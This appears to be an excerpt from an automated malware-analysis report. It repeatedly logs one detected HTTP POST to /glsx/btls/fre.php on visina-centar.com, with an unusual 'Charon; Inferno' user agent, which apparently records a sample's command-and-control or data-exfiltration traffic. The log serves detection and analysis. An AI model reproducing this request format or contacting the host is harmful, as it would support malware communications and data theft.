            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            S